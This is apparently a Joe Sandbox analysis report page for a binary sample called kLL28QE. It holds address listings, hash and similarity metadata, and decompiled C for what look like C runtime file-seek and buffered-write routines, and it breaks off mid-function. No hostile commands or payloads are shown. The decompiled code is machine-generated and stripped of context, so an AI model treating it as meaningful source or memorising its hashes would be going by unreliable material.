                                                                                                                                                                                                      0x0040c8d5
                                                                                                                                                                                                      0x0040c8d5
                                                                                                                                                                                                      0x0040c8d5
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0040c8d5
                                                                                                                                                                                                      0x0040c859
                                                                                                                                                                                                      0x0040c85b
                                                                                                                                                                                                      0x0040c85d
                                                                                                                                                                                                      0x0040c868
                                                                                                                                                                                                      0x0040c86b
                                                                                                                                                                                                      0x0040c88d
                                                                                                                                                                                                      0x0040c88f
                                                                                                                                                                                                      0x0040c892
                                                                                                                                                                                                      0x0040c895
                                                                                                                                                                                                      0x0040c89d
                                                                                                                                                                                                      0x0040c89f
                                                                                                                                                                                                      0x0040c8a6
                                                                                                                                                                                                      0x0040c8ab
                                                                                                                                                                                                      0x0040c8ae
                                                                                                                                                                                                      0x0040c8c0
                                                                                                                                                                                                      0x0040c8c0
                                                                                                                                                                                                      0x0040c8c3
                                                                                                                                                                                                      0x0040c8c3
                                                                                                                                                                                                      0x0040c8c8
                                                                                                                                                                                                      0x0040c8cd
                                                                                                                                                                                                      0x0040c8cd
                                                                                                                                                                                                      0x0040c8cf
                                                                                                                                                                                                      0x0040c8cf
                                                                                                                                                                                                      0x0040c8cf
                                                                                                                                                                                                      0x0040c8cf
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0040c8cd
                                                                                                                                                                                                      0x0040c8b0
                                                                                                                                                                                                      0x0040c8b3
                                                                                                                                                                                                      0x0040c8b6
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0040c8b8
                                                                                                                                                                                                      0x0040c8be
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0040c8be
                                                                                                                                                                                                      0x0040c8a1
                                                                                                                                                                                                      0x0040c8a1
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0040c8a1
                                                                                                                                                                                                      0x0040c86d
                                                                                                                                                                                                      0x0040c873
                                                                                                                                                                                                      0x0040c880
                                                                                                                                                                                                      0x0040c880
                                                                                                                                                                                                      0x0040c882
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0040c877
                                                                                                                                                                                                      0x0040c87a
                                                                                                                                                                                                      0x0040c87c
                                                                                                                                                                                                      0x0040c87c
                                                                                                                                                                                                      0x0040c87c
                                                                                                                                                                                                      0x0040c87c
                                                                                                                                                                                                      0x0040c87f
                                                                                                                                                                                                      0x0040c87f
                                                                                                                                                                                                      0x0040c87f
                                                                                                                                                                                                      0x0040c884
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0040c884
                                                                                                                                                                                                      0x0040c82b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0040c82b
                                                                                                                                                                                                      0x0040c7fe
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0040c7fe
                                                                                                                                                                                                      0x0040c80a
                                                                                                                                                                                                      0x0040c80f
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0040c80f
                                                                                                                                                                                                      0x0040c7ce
                                                                                                                                                                                                      0x0040c7d8
                                                                                                                                                                                                      0x0040c7db
                                                                                                                                                                                                      0x0040c7e0
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0040c7e2
                                                                                                                                                                                                      0x0040c7e4
                                                                                                                                                                                                      0x0040c7e6
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0040c7e8
                                                                                                                                                                                                      0x0040c7ea
                                                                                                                                                                                                      0x0040c7ea
                                                                                                                                                                                                      0x0040c7ed
                                                                                                                                                                                                      0x0040c7ef
                                                                                                                                                                                                      0x0040c7f2
                                                                                                                                                                                                      0x0040c7f2
                                                                                                                                                                                                      0x0040c7f2
                                                                                                                                                                                                      0x0040c7f4
                                                                                                                                                                                                      0x0040c7f5
                                                                                                                                                                                                      0x0040c7f5
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0040c7ea
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0040c7ab
                                                                                                                                                                                                      0x0040c79e
                                                                                                                                                                                                      0x0040c75b
                                                                                                                                                                                                      0x0040c760
                                                                                                                                                                                                      0x0040c761
                                                                                                                                                                                                      0x0040c762
                                                                                                                                                                                                      0x0040c763
                                                                                                                                                                                                      0x0040c764
                                                                                                                                                                                                      0x0040c765
                                                                                                                                                                                                      0x0040c76b
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • __fileno.LIBCMT ref: 0040C77C
                                                                                                                                                                                                      • __locking.LIBCMT ref: 0040C791
                                                                                                                                                                                                        • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                                                                                                        • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.408060927.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.408060927.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000006.00000002.408060927.000000000044D000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_kLL28QE.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: __decode_pointer__fileno__getptd_noexit__locking
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2395185920-0
                                                                                                                                                                                                      • Opcode ID: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                                                                                                                                                                      • Instruction ID: 30055f4621fb528cea72007990449f1feb1a7f288d573051c200dc5e1a244c20
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                                                                                                                                                                      • Instruction Fuzzy Hash: CC51CF72E00209EBDB10AF69C9C0B59BBA1AF01355F14C27AD915B73D1D378AE41DB8D
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 97%
                                                                                                                                                                                                      			E00405D00(void* __ebx, void* __edx, void* __ebp, signed int* _a4, signed int _a8, intOrPtr _a12) {
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t30;
                                                                                                                                                                                                      				signed int _t31;
                                                                                                                                                                                                      				signed int _t32;
                                                                                                                                                                                                      				signed int _t33;
                                                                                                                                                                                                      				signed int _t35;
                                                                                                                                                                                                      				signed int _t39;
                                                                                                                                                                                                      				void* _t42;
                                                                                                                                                                                                      				intOrPtr _t43;
                                                                                                                                                                                                      				void* _t45;
                                                                                                                                                                                                      				signed int _t48;
                                                                                                                                                                                                      				signed int* _t53;
                                                                                                                                                                                                      				void* _t54;
                                                                                                                                                                                                      				void* _t55;
                                                                                                                                                                                                      				void* _t57;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t54 = __ebp;
                                                                                                                                                                                                      				_t45 = __edx;
                                                                                                                                                                                                      				_t42 = __ebx;
                                                                                                                                                                                                      				_t53 = _a4;
                                                                                                                                                                                                      				if(_t53 == 0) {
                                                                                                                                                                                                      					L40:
                                                                                                                                                                                                      					_t31 = _t30 | 0xffffffff;
                                                                                                                                                                                                      					__eflags = _t31;
                                                                                                                                                                                                      					return _t31;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t43 = _a12;
                                                                                                                                                                                                      					if(_t43 == 2) {
                                                                                                                                                                                                      						goto L40;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_t30 = _t53[0xe];
                                                                                                                                                                                                      						if(_t30 == 0xffffffff || _t30 == 0xfffffffd) {
                                                                                                                                                                                                      							goto L40;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t48 = _a8;
                                                                                                                                                                                                      							if(_t53[0x17] != 0x77) {
                                                                                                                                                                                                      								__eflags = _t43 - 1;
                                                                                                                                                                                                      								if(_t43 == 1) {
                                                                                                                                                                                                      									_t48 = _t48 + _t53[0x1a];
                                                                                                                                                                                                      									__eflags = _t48;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								__eflags = _t48;
                                                                                                                                                                                                      								if(_t48 < 0) {
                                                                                                                                                                                                      									goto L39;
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									__eflags = _t53[0x16];
                                                                                                                                                                                                      									if(__eflags == 0) {
                                                                                                                                                                                                      										_t33 = _t53[0x1a];
                                                                                                                                                                                                      										__eflags = _t48 - _t33;
                                                                                                                                                                                                      										if(_t48 < _t33) {
                                                                                                                                                                                                      											_t30 = E004054F0(_t42, _t54, _t53);
                                                                                                                                                                                                      											_t55 = _t55 + 4;
                                                                                                                                                                                                      											__eflags = _t30;
                                                                                                                                                                                                      											if(_t30 < 0) {
                                                                                                                                                                                                      												goto L39;
                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                      												goto L27;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                      											_t48 = _t48 - _t33;
                                                                                                                                                                                                      											L27:
                                                                                                                                                                                                      											__eflags = _t48;
                                                                                                                                                                                                      											if(_t48 == 0) {
                                                                                                                                                                                                      												L38:
                                                                                                                                                                                                      												return _t53[0x1a];
                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                      												__eflags = _t53[0x12];
                                                                                                                                                                                                      												if(_t53[0x12] != 0) {
                                                                                                                                                                                                      													L30:
                                                                                                                                                                                                      													__eflags = _t53[0x1b] - 0xffffffff;
                                                                                                                                                                                                      													if(_t53[0x1b] != 0xffffffff) {
                                                                                                                                                                                                      														_t53[0x1a] = _t53[0x1a] + 1;
                                                                                                                                                                                                      														_t48 = _t48 - 1;
                                                                                                                                                                                                      														__eflags = _t53[0x1c];
                                                                                                                                                                                                      														_t53[0x1b] = 0xffffffff;
                                                                                                                                                                                                      														if(_t53[0x1c] != 0) {
                                                                                                                                                                                                      															_t53[0xe] = 1;
                                                                                                                                                                                                      														}
                                                                                                                                                                                                      													}
                                                                                                                                                                                                      													__eflags = _t48;
                                                                                                                                                                                                      													if(_t48 <= 0) {
                                                                                                                                                                                                      														goto L38;
                                                                                                                                                                                                      													} else {
                                                                                                                                                                                                      														while(1) {
                                                                                                                                                                                                      															_t35 = 0x4000;
                                                                                                                                                                                                      															__eflags = _t48 - 0x4000;
                                                                                                                                                                                                      															if(_t48 < 0x4000) {
                                                                                                                                                                                                      																_t35 = _t48;
                                                                                                                                                                                                      															}
                                                                                                                                                                                                      															_t30 = E00405A20(_t45, _t53, _t53[0x12], _t35);
                                                                                                                                                                                                      															_t55 = _t55 + 0xc;
                                                                                                                                                                                                      															__eflags = _t30;
                                                                                                                                                                                                      															if(_t30 <= 0) {
                                                                                                                                                                                                      																goto L39;
                                                                                                                                                                                                      															}
                                                                                                                                                                                                      															_t48 = _t48 - _t30;
                                                                                                                                                                                                      															__eflags = _t48;
                                                                                                                                                                                                      															if(_t48 > 0) {
                                                                                                                                                                                                      																continue;
                                                                                                                                                                                                      															} else {
                                                                                                                                                                                                      																goto L38;
                                                                                                                                                                                                      															}
                                                                                                                                                                                                      															goto L41;
                                                                                                                                                                                                      														}
                                                                                                                                                                                                      														goto L39;
                                                                                                                                                                                                      													}
                                                                                                                                                                                                      												} else {
                                                                                                                                                                                                      													_t30 = E0040B84D(_t42, _t45, _t48, 0x4000);
                                                                                                                                                                                                      													_t55 = _t55 + 4;
                                                                                                                                                                                                      													_t53[0x12] = _t30;
                                                                                                                                                                                                      													__eflags = _t30;
                                                                                                                                                                                                      													if(_t30 == 0) {
                                                                                                                                                                                                      														goto L39;
                                                                                                                                                                                                      													} else {
                                                                                                                                                                                                      														goto L30;
                                                                                                                                                                                                      													}
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										_push(0);
                                                                                                                                                                                                      										_push(_t48);
                                                                                                                                                                                                      										_push(_t53[0x10]);
                                                                                                                                                                                                      										_t53[0x1b] = 0xffffffff;
                                                                                                                                                                                                      										_t53[1] = 0;
                                                                                                                                                                                                      										 *_t53 = _t53[0x11];
                                                                                                                                                                                                      										_t30 = E0040C46B(_t42, _t53[0x10], _t48, _t53, __eflags);
                                                                                                                                                                                                      										__eflags = _t30;
                                                                                                                                                                                                      										if(_t30 < 0) {
                                                                                                                                                                                                      											goto L39;
                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                      											_t53[0x1a] = _t48;
                                                                                                                                                                                                      											_t53[0x19] = _t48;
                                                                                                                                                                                                      											return _t48;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								if(_t43 == 0) {
                                                                                                                                                                                                      									_t48 = _t48 - _t53[0x19];
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								if(_t48 < 0) {
                                                                                                                                                                                                      									L39:
                                                                                                                                                                                                      									_t32 = _t30 | 0xffffffff;
                                                                                                                                                                                                      									__eflags = _t32;
                                                                                                                                                                                                      									return _t32;
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									if(_t53[0x11] != 0) {
                                                                                                                                                                                                      										L11:
                                                                                                                                                                                                      										if(_t48 <= 0) {
                                                                                                                                                                                                      											L17:
                                                                                                                                                                                                      											return _t53[0x19];
                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                      											while(1) {
                                                                                                                                                                                                      												_t39 = 0x4000;
                                                                                                                                                                                                      												if(_t48 < 0x4000) {
                                                                                                                                                                                                      													_t39 = _t48;
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      												_t30 = E00405260(_t42, _t45, _t53, _t53[0x11], _t39);
                                                                                                                                                                                                      												_t55 = _t55 + 0xc;
                                                                                                                                                                                                      												if(_t30 == 0) {
                                                                                                                                                                                                      													goto L39;
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      												_t48 = _t48 - _t30;
                                                                                                                                                                                                      												if(_t48 > 0) {
                                                                                                                                                                                                      													continue;
                                                                                                                                                                                                      												} else {
                                                                                                                                                                                                      													goto L17;
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      												goto L41;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      											goto L39;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										_t30 = E0040B84D(_t42, _t45, _t48, 0x4000);
                                                                                                                                                                                                      										_t57 = _t55 + 4;
                                                                                                                                                                                                      										_t53[0x11] = _t30;
                                                                                                                                                                                                      										if(_t30 == 0) {
                                                                                                                                                                                                      											goto L39;
                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                      											E0040BA30(_t48, _t30, 0, 0x4000);
                                                                                                                                                                                                      											_t55 = _t57 + 0xc;
                                                                                                                                                                                                      											goto L11;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				L41:
                                                                                                                                                                                                      			}



















                                                                                                                                                                                                      0x00405d00
                                                                                                                                                                                                      0x00405d00
                                                                                                                                                                                                      0x00405d00
                                                                                                                                                                                                      0x00405d01
                                                                                                                                                                                                      0x00405d07
                                                                                                                                                                                                      0x00405e7f
                                                                                                                                                                                                      0x00405e7f
                                                                                                                                                                                                      0x00405e7f
                                                                                                                                                                                                      0x00405e83
                                                                                                                                                                                                      0x00405d0d
                                                                                                                                                                                                      0x00405d0d
                                                                                                                                                                                                      0x00405d14
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00405d1a
                                                                                                                                                                                                      0x00405d1a
                                                                                                                                                                                                      0x00405d20
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00405d2f
                                                                                                                                                                                                      0x00405d34
                                                                                                                                                                                                      0x00405d38
                                                                                                                                                                                                      0x00405dad
                                                                                                                                                                                                      0x00405db0
                                                                                                                                                                                                      0x00405db2
                                                                                                                                                                                                      0x00405db2
                                                                                                                                                                                                      0x00405db2
                                                                                                                                                                                                      0x00405db5
                                                                                                                                                                                                      0x00405db7
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00405dbd
                                                                                                                                                                                                      0x00405dbd
                                                                                                                                                                                                      0x00405dc1
                                                                                                                                                                                                      0x00405df8
                                                                                                                                                                                                      0x00405dfb
                                                                                                                                                                                                      0x00405dfd
                                                                                                                                                                                                      0x00405e04
                                                                                                                                                                                                      0x00405e09
                                                                                                                                                                                                      0x00405e0c
                                                                                                                                                                                                      0x00405e0e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00405dff
                                                                                                                                                                                                      0x00405dff
                                                                                                                                                                                                      0x00405e10
                                                                                                                                                                                                      0x00405e10
                                                                                                                                                                                                      0x00405e12
                                                                                                                                                                                                      0x00405e73
                                                                                                                                                                                                      0x00405e78
                                                                                                                                                                                                      0x00405e14
                                                                                                                                                                                                      0x00405e14
                                                                                                                                                                                                      0x00405e18
                                                                                                                                                                                                      0x00405e2e
                                                                                                                                                                                                      0x00405e2e
                                                                                                                                                                                                      0x00405e32
                                                                                                                                                                                                      0x00405e34
                                                                                                                                                                                                      0x00405e37
                                                                                                                                                                                                      0x00405e38
                                                                                                                                                                                                      0x00405e3c
                                                                                                                                                                                                      0x00405e43
                                                                                                                                                                                                      0x00405e45
                                                                                                                                                                                                      0x00405e45
                                                                                                                                                                                                      0x00405e43
                                                                                                                                                                                                      0x00405e4c
                                                                                                                                                                                                      0x00405e4e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00405e50
                                                                                                                                                                                                      0x00405e50
                                                                                                                                                                                                      0x00405e50
                                                                                                                                                                                                      0x00405e55
                                                                                                                                                                                                      0x00405e57
                                                                                                                                                                                                      0x00405e59
                                                                                                                                                                                                      0x00405e59
                                                                                                                                                                                                      0x00405e61
                                                                                                                                                                                                      0x00405e66
                                                                                                                                                                                                      0x00405e69
                                                                                                                                                                                                      0x00405e6b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00405e6d
                                                                                                                                                                                                      0x00405e6f
                                                                                                                                                                                                      0x00405e71
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00405e71
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00405e50
                                                                                                                                                                                                      0x00405e1a
                                                                                                                                                                                                      0x00405e1f
                                                                                                                                                                                                      0x00405e24
                                                                                                                                                                                                      0x00405e27
                                                                                                                                                                                                      0x00405e2a
                                                                                                                                                                                                      0x00405e2c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00405e2c
                                                                                                                                                                                                      0x00405e18
                                                                                                                                                                                                      0x00405e12
                                                                                                                                                                                                      0x00405dc3
                                                                                                                                                                                                      0x00405dc9
                                                                                                                                                                                                      0x00405dcb
                                                                                                                                                                                                      0x00405dcc
                                                                                                                                                                                                      0x00405dcd
                                                                                                                                                                                                      0x00405dd4
                                                                                                                                                                                                      0x00405ddb
                                                                                                                                                                                                      0x00405ddd
                                                                                                                                                                                                      0x00405de5
                                                                                                                                                                                                      0x00405de7
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00405ded
                                                                                                                                                                                                      0x00405ded
                                                                                                                                                                                                      0x00405df0
                                                                                                                                                                                                      0x00405df7
                                                                                                                                                                                                      0x00405df7
                                                                                                                                                                                                      0x00405de7
                                                                                                                                                                                                      0x00405dc1
                                                                                                                                                                                                      0x00405d3a
                                                                                                                                                                                                      0x00405d3c
                                                                                                                                                                                                      0x00405d3e
                                                                                                                                                                                                      0x00405d3e
                                                                                                                                                                                                      0x00405d43
                                                                                                                                                                                                      0x00405e79
                                                                                                                                                                                                      0x00405e7a
                                                                                                                                                                                                      0x00405e7a
                                                                                                                                                                                                      0x00405e7e
                                                                                                                                                                                                      0x00405d49
                                                                                                                                                                                                      0x00405d4d
                                                                                                                                                                                                      0x00405d77
                                                                                                                                                                                                      0x00405d79
                                                                                                                                                                                                      0x00405da7
                                                                                                                                                                                                      0x00405dac
                                                                                                                                                                                                      0x00405d7b
                                                                                                                                                                                                      0x00405d80
                                                                                                                                                                                                      0x00405d80
                                                                                                                                                                                                      0x00405d87
                                                                                                                                                                                                      0x00405d89
                                                                                                                                                                                                      0x00405d89
                                                                                                                                                                                                      0x00405d91
                                                                                                                                                                                                      0x00405d96
                                                                                                                                                                                                      0x00405d9b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00405da1
                                                                                                                                                                                                      0x00405da5
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00405da5
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00405d80
                                                                                                                                                                                                      0x00405d4f
                                                                                                                                                                                                      0x00405d54
                                                                                                                                                                                                      0x00405d59
                                                                                                                                                                                                      0x00405d5c
                                                                                                                                                                                                      0x00405d61
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00405d67
                                                                                                                                                                                                      0x00405d6f
                                                                                                                                                                                                      0x00405d74
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00405d74
                                                                                                                                                                                                      0x00405d61
                                                                                                                                                                                                      0x00405d4d
                                                                                                                                                                                                      0x00405d43
                                                                                                                                                                                                      0x00405d38
                                                                                                                                                                                                      0x00405d20
                                                                                                                                                                                                      0x00405d14
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.408060927.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.408060927.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000006.00000002.408060927.000000000044D000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_kLL28QE.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _fseek_malloc_memset
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 208892515-0
                                                                                                                                                                                                      • Opcode ID: 9fe2477137ff98b8fe919820eb2b1ff53dfeab7efe35faa63f44dd20cd1a70ab
                                                                                                                                                                                                      • Instruction ID: b5a371ba5f9a3ad1fa090fb1a89082137fe8d6c03bc5c52cd66242ccf2a60741
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9fe2477137ff98b8fe919820eb2b1ff53dfeab7efe35faa63f44dd20cd1a70ab
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3541A572600F018AD630972EE804B2772E5DF90364F140A3FE9E6E27D5E738E9458F89
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 91%
                                                                                                                                                                                                      			E0040BAAA(signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				signed int _v12;
                                                                                                                                                                                                      				signed int _v16;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				void* __ebp;
                                                                                                                                                                                                      				signed int _t59;
                                                                                                                                                                                                      				intOrPtr* _t61;
                                                                                                                                                                                                      				signed int _t63;
                                                                                                                                                                                                      				void* _t68;
                                                                                                                                                                                                      				signed int _t69;
                                                                                                                                                                                                      				signed int _t72;
                                                                                                                                                                                                      				signed int _t74;
                                                                                                                                                                                                      				signed int _t75;
                                                                                                                                                                                                      				signed int _t77;
                                                                                                                                                                                                      				signed int _t78;
                                                                                                                                                                                                      				signed int _t81;
                                                                                                                                                                                                      				signed int _t82;
                                                                                                                                                                                                      				signed int _t84;
                                                                                                                                                                                                      				signed int _t88;
                                                                                                                                                                                                      				signed int _t97;
                                                                                                                                                                                                      				signed int _t98;
                                                                                                                                                                                                      				signed int _t99;
                                                                                                                                                                                                      				intOrPtr* _t100;
                                                                                                                                                                                                      				void* _t101;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t90 = __edx;
                                                                                                                                                                                                      				if(_a8 == 0 || _a12 == 0) {
                                                                                                                                                                                                      					L4:
                                                                                                                                                                                                      					return 0;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t100 = _a16;
                                                                                                                                                                                                      					_t105 = _t100;
                                                                                                                                                                                                      					if(_t100 != 0) {
                                                                                                                                                                                                      						_t82 = _a4;
                                                                                                                                                                                                      						__eflags = _t82;
                                                                                                                                                                                                      						if(__eflags == 0) {
                                                                                                                                                                                                      							goto L3;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t63 = _t59 | 0xffffffff;
                                                                                                                                                                                                      						_t90 = _t63 % _a8;
                                                                                                                                                                                                      						__eflags = _a12 - _t63 / _a8;
                                                                                                                                                                                                      						if(__eflags > 0) {
                                                                                                                                                                                                      							goto L3;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t97 = _a8 * _a12;
                                                                                                                                                                                                      						__eflags =  *(_t100 + 0xc) & 0x0000010c;
                                                                                                                                                                                                      						_v8 = _t82;
                                                                                                                                                                                                      						_v16 = _t97;
                                                                                                                                                                                                      						_t81 = _t97;
                                                                                                                                                                                                      						if(( *(_t100 + 0xc) & 0x0000010c) == 0) {
                                                                                                                                                                                                      							_v12 = 0x1000;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_v12 =  *(_t100 + 0x18);
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						__eflags = _t97;
                                                                                                                                                                                                      						if(_t97 == 0) {
                                                                                                                                                                                                      							L32:
                                                                                                                                                                                                      							return _a12;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							do {
                                                                                                                                                                                                      								_t84 =  *(_t100 + 0xc) & 0x00000108;
                                                                                                                                                                                                      								__eflags = _t84;
                                                                                                                                                                                                      								if(_t84 == 0) {
                                                                                                                                                                                                      									L18:
                                                                                                                                                                                                      									__eflags = _t81 - _v12;
                                                                                                                                                                                                      									if(_t81 < _v12) {
                                                                                                                                                                                                      										_t68 = E0040F0AD(_t90, _t97,  *_v8, _t100);
                                                                                                                                                                                                      										__eflags = _t68 - 0xffffffff;
                                                                                                                                                                                                      										if(_t68 == 0xffffffff) {
                                                                                                                                                                                                      											L34:
                                                                                                                                                                                                      											_t69 = _t97;
                                                                                                                                                                                                      											L35:
                                                                                                                                                                                                      											return (_t69 - _t81) / _a8;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										_v8 = _v8 + 1;
                                                                                                                                                                                                      										_t72 =  *(_t100 + 0x18);
                                                                                                                                                                                                      										_t81 = _t81 - 1;
                                                                                                                                                                                                      										_v12 = _t72;
                                                                                                                                                                                                      										__eflags = _t72;
                                                                                                                                                                                                      										if(_t72 <= 0) {
                                                                                                                                                                                                      											_v12 = 1;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										goto L31;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									__eflags = _t84;
                                                                                                                                                                                                      									if(_t84 == 0) {
                                                                                                                                                                                                      										L21:
                                                                                                                                                                                                      										__eflags = _v12;
                                                                                                                                                                                                      										_t98 = _t81;
                                                                                                                                                                                                      										if(_v12 != 0) {
                                                                                                                                                                                                      											_t75 = _t81;
                                                                                                                                                                                                      											_t90 = _t75 % _v12;
                                                                                                                                                                                                      											_t98 = _t98 - _t75 % _v12;
                                                                                                                                                                                                      											__eflags = _t98;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										_push(_t98);
                                                                                                                                                                                                      										_push(_v8);
                                                                                                                                                                                                      										_push(E0040FA20(_t90, _t98, _t100));
                                                                                                                                                                                                      										_t74 = E0040F944(_t81, _t90, _t98, _t100, __eflags);
                                                                                                                                                                                                      										_t101 = _t101 + 0xc;
                                                                                                                                                                                                      										__eflags = _t74 - 0xffffffff;
                                                                                                                                                                                                      										if(_t74 == 0xffffffff) {
                                                                                                                                                                                                      											L36:
                                                                                                                                                                                                      											 *(_t100 + 0xc) =  *(_t100 + 0xc) | 0x00000020;
                                                                                                                                                                                                      											_t69 = _v16;
                                                                                                                                                                                                      											goto L35;
                                                                                                                                                                                                      										} else {
